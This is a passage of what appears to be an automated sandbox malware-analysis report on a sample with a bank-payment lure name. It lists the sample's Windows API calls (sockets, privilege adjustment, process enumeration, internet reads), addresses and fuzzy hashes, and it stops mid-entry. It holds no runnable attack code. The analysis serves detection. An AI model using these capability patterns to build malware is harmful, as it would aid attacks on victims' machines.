                                                                                                                                • Instruction ID: 60c3a209c7f7ddfa7ff53f1be9efa22dca687d4bec6983be9eef04793576e8f5
                                                                                                                                • Opcode Fuzzy Hash: 788ed155929db43feb767ce9b3d208ee33edb11c8a47d0477f8c6b3d472175c7
                                                                                                                                • Instruction Fuzzy Hash: 4E928C70A08351DFE724DF24C494B2AB7E1BF85304F14896DE98A8B362D779EC45CB92
                                                                                                                                APIs
                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007962DC
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007962EB
                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00796307
                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00796316
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00796330
                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00796344
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279440585-0
                                                                                                                                • Opcode ID: 594a71168f5b94487acda9a8448a8b69efdacb5ccfacffe2cd63598469509e14
                                                                                                                                • Instruction ID: a4e1f6f3438f40aa4fd5632519324e6a139cf0df4bfad5f31e7e10e93ce9d390
                                                                                                                                • Opcode Fuzzy Hash: 594a71168f5b94487acda9a8448a8b69efdacb5ccfacffe2cd63598469509e14
                                                                                                                                • Instruction Fuzzy Hash: B021D071600210DFCF10EF64EC89A6EB7E9EF89720F188259E956A7391C778AC01CB51
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
                                                                                                                                  • Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01
                                                                                                                                • _memmove.LIBCMT ref: 00770258
                                                                                                                                • _memmove.LIBCMT ref: 0077036D
                                                                                                                                • _memmove.LIBCMT ref: 00770414
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1300846289-0
                                                                                                                                • Opcode ID: 0acc1d98ba415f1b80887013fa23328282c3ebce23c84c8b760c24d82d22bc7b
                                                                                                                                • Instruction ID: 33182b41ee9f9334049d03416311ced95f6401e911533f4faf1dd9ed80ba5128
                                                                                                                                • Opcode Fuzzy Hash: 0acc1d98ba415f1b80887013fa23328282c3ebce23c84c8b760c24d82d22bc7b
                                                                                                                                • Instruction Fuzzy Hash: 9202DFB0A00219DBDF04DF64D985AAEBBB5FF44340F54C069E80ADB256EB39E950CB91
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 007219FA
                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00721A4E
                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00721A61
                                                                                                                                  • Part of subcall function 00721290: DefDlgProcW.USER32(?,00000020,?), ref: 007212D8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ColorProc$LongWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3744519093-0
                                                                                                                                • Opcode ID: 776bd04ac6e0c8d79575c65a459e501c22f88f71fc7fc8dca46f0ef23863aab5
                                                                                                                                • Instruction ID: 97de91a2b1be3d1063012bbb41ddef3dea72ab47848ecacee6e906504a25e3bc
                                                                                                                                • Opcode Fuzzy Hash: 776bd04ac6e0c8d79575c65a459e501c22f88f71fc7fc8dca46f0ef23863aab5
                                                                                                                                • Instruction Fuzzy Hash: FBA190711025B4FED7389B387C49EBF366CFFA6342B948219F402D5192CB6EAD0192B5
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00797D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00797DB6
                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0079679E
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007967C7
                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00796800
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0079680D
                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00796821
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 99427753-0
                                                                                                                                • Opcode ID: fe4ba35db9a66d674c438e384297ba33da544cb8b1f487e4c4fca8e0ace07e69
                                                                                                                                • Instruction ID: 2220765c44567bfdcdcf08e1e20aa1d696d1a3c5d6a4893260f774a3afae79d0
                                                                                                                                • Opcode Fuzzy Hash: fe4ba35db9a66d674c438e384297ba33da544cb8b1f487e4c4fca8e0ace07e69
                                                                                                                                • Instruction Fuzzy Hash: 6A41D475B00220EFDF50AF64AC8AF6E77E8DF49714F488558FA15AB3C2DA789D008791
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 292994002-0
                                                                                                                                • Opcode ID: 8484deec13fa3b03a01f52541be0e28e135e56e525702c221f36b6005b90320e
                                                                                                                                • Instruction ID: d1ab1b6e1330d8cc364bf5242eca3b23d47eb4c9b744fe52799181e1aa3ee96d
                                                                                                                                • Opcode Fuzzy Hash: 8484deec13fa3b03a01f52541be0e28e135e56e525702c221f36b6005b90320e
                                                                                                                                • Instruction Fuzzy Hash: 60112732700921AFDF206F26DC48A2E7B98FFC67A1B448139F845D3241CB7CDC0186A4
                                                                                                                                APIs
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007780C0
                                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007780CA
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007780D9
                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007780E0
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007780F6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 44706859-0
                                                                                                                                • Opcode ID: 215c521719b0e54ec499a8f95445cd64ac0ff5cd1501fbb05f62d5a2d04cfc9c
                                                                                                                                • Instruction ID: f9183a42d6b262c30ae0af789edaa38e2e4fb04d50386ae5fc47c9d64f8556cf
                                                                                                                                • Opcode Fuzzy Hash: 215c521719b0e54ec499a8f95445cd64ac0ff5cd1501fbb05f62d5a2d04cfc9c
                                                                                                                                • Instruction Fuzzy Hash: 72F06231240208AFEB501FA5EC8DE673BACEF8A795B508029F949C6150CB699C41DE61
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00724AD0), ref: 00724B45
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00724B57
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                                • Opcode ID: 210920dd322e45696f2d522e8693b5790142d2138ff71546207e8f68f9c58e14
                                                                                                                                • Instruction ID: fdebff7618a886da0f7c5beaace4f073252719e8e01a4d9e1cec3e9ca5c3d953
                                                                                                                                • Opcode Fuzzy Hash: 210920dd322e45696f2d522e8693b5790142d2138ff71546207e8f68f9c58e14
                                                                                                                                • Instruction Fuzzy Hash: 37D012B4A10727DFD7209FB1E858B4676E5AF86351B11C83DD486D6150D678D480CA68
                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0079EE3D
                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0079EE4B
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0079EF0B
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0079EF1A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2576544623-0
                                                                                                                                • Opcode ID: a8b84010582c5ebbb464a8df5438052a05beff2927bce30768eb7abb7863ce69
                                                                                                                                • Instruction ID: e499aa6056e043193cc519290dd12d29b1cea989eee7adacc63ddbf646fbe63f
                                                                                                                                • Opcode Fuzzy Hash: a8b84010582c5ebbb464a8df5438052a05beff2927bce30768eb7abb7863ce69
                                                                                                                                • Instruction Fuzzy Hash: 4551AE71104311EFD710EF20EC89E6BB7E8EF88710F44482DF595972A1EB34A908CB92
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0077E628
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen
                                                                                                                                • String ID: ($|
                                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                                • Opcode ID: 7985705368f115387f2a461caf0157ca8efdcec5928a5c956b7979c9d44aceac
                                                                                                                                • Instruction ID: 0d26a543d8f376d87f57a916804d547c573874eb05c905f696fb6285bdda5772
                                                                                                                                • Opcode Fuzzy Hash: 7985705368f115387f2a461caf0157ca8efdcec5928a5c956b7979c9d44aceac
                                                                                                                                • Instruction Fuzzy Hash: 82322475A00705DFDB28CF29C48196AB7F1FF48360B15C4AEE99ADB3A1E774A941CB40
                                                                                                                                APIs
                                                                                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0079180A,00000000), ref: 007923E1
                                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00792418
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 599397726-0
                                                                                                                                • Opcode ID: 009ee524328a39296fe5b5b9887576702f0f065ada7b093edb13831b6afd1856
                                                                                                                                • Instruction ID: 83c7b19465c50409081fab440a7911a0dac6ad034d8685f565e34db269be7993
                                                                                                                                • Opcode Fuzzy Hash: 009ee524328a39296fe5b5b9887576702f0f065ada7b093edb13831b6afd1856
                                                                                                                                • Instruction Fuzzy Hash: C741C471A04209FFEF10FE95EC85EBB77BCEB40314F10406AF641A6152DB7D9E429A60
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0078B343
                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0078B39D
                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0078B3EA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1682464887-0
                                                                                                                                • Opcode ID: c282a892a244934e2dd9703c7dcda450ce3933c5b5f0a5da2abdb8b79446c41c
                                                                                                                                • Instruction ID: f36ab24514001a7b2a1a5dd1093287fc4c8d286d572f36df38aebe8ad0e8b428
                                                                                                                                • Opcode Fuzzy Hash: c282a892a244934e2dd9703c7dcda450ce3933c5b5f0a5da2abdb8b79446c41c
                                                                                                                                • Instruction Fuzzy Hash: ED217135A00518EFCB00EFA5D885EEDBBB8FF49310F1480A9E905AB351CB35A915CB54
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
                                                                                                                                  • Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077882B
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00778858
                                                                                                                                • GetLastError.KERNEL32 ref: 00778865
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1922334811-0
                                                                                                                                • Opcode ID: 325ef876a82c82b9f08e1db842ff29940b9ec0f2c71f0928ac5d7601b1460aa5
                                                                                                                                • Instruction ID: a002d1e0214ea5b09d025f7128a6e4726f8ddd61c3ca361453e33f04228b619d
                                                                                                                                • Opcode Fuzzy Hash: 325ef876a82c82b9f08e1db842ff29940b9ec0f2c71f0928ac5d7601b1460aa5
                                                                                                                                • Instruction Fuzzy Hash: 21118FB2914204AFEB18EFA4DC89D6BB7F8EB45751B20C52EF45997241EB34BC408B61
                                                                                                                                APIs
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00778774
                                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0077878B
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 0077879B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3429775523-0
                                                                                                                                • Opcode ID: 8caffd8d4944e3c91bd8ba158f9e8d68e0caa8b7187c1b0b0be84df6b5f1ebeb
                                                                                                                                • Instruction ID: b67954a33d3d483a1aa3d161236fd2808eaf0dfae189e0d9c6428fd2c506157c
                                                                                                                                • Opcode Fuzzy Hash: 8caffd8d4944e3c91bd8ba158f9e8d68e0caa8b7187c1b0b0be84df6b5f1ebeb
                                                                                                                                • Instruction Fuzzy Hash: 6DF04975A5130CBFDF04DFF4DC89AAEBBBCEF08201F1084A9E902E2181E6756A048B55
                                                                                                                                APIs
                                                                                                                                • __time64.LIBCMT ref: 0078889B
                                                                                                                                  • Part of subcall function 0074520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00788F6E,00000000,?,?,?,?,0078911F,00000000,?), ref: 00745213
                                                                                                                                  • Part of subcall function 0074520A: __aulldiv.LIBCMT ref: 00745233
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                • String ID: 0e~
                                                                                                                                • API String ID: 2893107130-1948122971
                                                                                                                                • Opcode ID: 44b904176e9ef959f6b2c6b77509e6d5d3f2782d1a63a38ded67bf39b6fef629
                                                                                                                                • Instruction ID: bd90dbade1a72e18e5a906b0d7f5f1f0a96c7b2c33e9fe042a7782059a38229e
                                                                                                                                • Opcode Fuzzy Hash: 44b904176e9ef959f6b2c6b77509e6d5d3f2782d1a63a38ded67bf39b6fef629
                                                                                                                                • Instruction Fuzzy Hash: A9217272635650CBC729CF29D881A52B3E1EBA9311B688E6CD1F5CF2D0CA78A905CB54
                                                                                                                                APIs
                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00784CB3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: mouse_event
                                                                                                                                • String ID: DOWN
                                                                                                                                • API String ID: 2434400541-711622031
                                                                                                                                • Opcode ID: bb5545c38a869c10ddd4caadca8d6b4a51e45cdc3e228bf67be6ef1ddda26c5d
                                                                                                                                • Instruction ID: c482846326346538874e04d54929a8dd6ed7d987ee07ac57f38acb81000a469c
                                                                                                                                • Opcode Fuzzy Hash: bb5545c38a869c10ddd4caadca8d6b4a51e45cdc3e228bf67be6ef1ddda26c5d
                                                                                                                                • Instruction Fuzzy Hash: 62E08CB21DD7223DB9083919FD0BEB7078C8B12331B910207F810E51C2EE9CAC8226B8
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0078C6FB
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078C72B
                                                                                                                                Memory Dump Source
